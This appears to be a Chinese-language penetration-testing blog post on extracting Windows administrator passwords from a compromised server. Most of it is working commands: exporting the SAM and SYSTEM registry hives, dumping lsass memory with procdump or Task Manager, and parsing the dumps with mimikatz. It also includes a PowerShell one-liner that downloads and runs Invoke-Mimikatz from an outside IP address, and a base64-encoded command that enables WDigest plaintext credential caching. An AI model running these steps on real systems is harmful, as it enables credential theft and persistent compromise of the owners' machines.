0%

内存中获取管理员明文密码

内存中获取管理员明文密码

注册表导出hash解密

导出sam.hiv文件:

1
reg save hklm\sam C:\wwwroot\sam.hiv

image.png
导出sys.hiv文件:

1
reg save hklm\system C:\wwwroot\sys.hiv

image.png
下载这两个文件,放到mimikatz目录中:
image.png
image.png
双击启动mimikatz.exe文件:

1
2
log		//生成日志文件
lsadump::sam /sam:Sam.hiv /system:Sys.hiv //抓取密码

image.png
使用以下解码平台解密NTLM

由于我的密码是强密码,所有没有解密出来:
image.png
我用自己密码加密。可以看出,结果是正确的

内存中获取明文

需要满足两个条件:

  • 用户登录过该系统
  • 登陆后未被重启过

    可以从内存中获取明文密码:

    使用命令ver查看版本:版本低于6.3的可以从内存中获取明文密码:
    image.png

    procdump获取内存文件

    上传procdump文件到目标服务器:
    执行命令:
    1
    C:/wwwroot/procdumpx64.exe  -accepteula -ma lsass.exe C:/wwwroot/lsass.dmp
    image.png
    image.png
    下载lsass.dmpmimikatz目录中:
    image.png
    执行以下命令:
    1
    2
    3
    log	
    sekurlsa::minidump lsass.dmp
    sekurlsa::logonPasswords full
    然后查看日志文件mimikatz.log
    image.png
    可以看到已经拿到了明文密码

    任务管理器导出内存文件

    从任务管理器中找到lsass.exe进程:

右键-创建转储文件
image.png
拿到lsass.DMP文件后还是使用mimiktz的命令即可:

1
2
3
log	
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

Powershell+mimikatz

上传Invoke-Mimikatz.ps1到目标服务器
image.png
使用以下命令直接获取明文密码:

1
powershell "IEX (New-Object Net.WebClient).DownloadString('http://139.155.236.39/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

image.png
明文密码在这儿:
image.png

Mimikatz直接读取

上传mimikatz_x64文件到目标服务器上:
image.png
直接运行即可得到明文密码:
image.png

无法从内存中获取明文密码

修改注册表

执行以下命令:

1
Powershell -ENC dAByAHkAIAB7ACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB2AGkAZABlAHIAcwBcAFcARABpAGcAZQBzAHQAIAAtAE4AYQBtAGUAIABVAHMAZQBMAG8AZwBvAG4AQwByAGUAZABlAG4AdABpAGEAbAAgAC0AVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAH0AYwBhAHQAYwBoACAAewAgAH0A

image.png
重启服务器后使用以上操作就可以在内存中获取明文密码了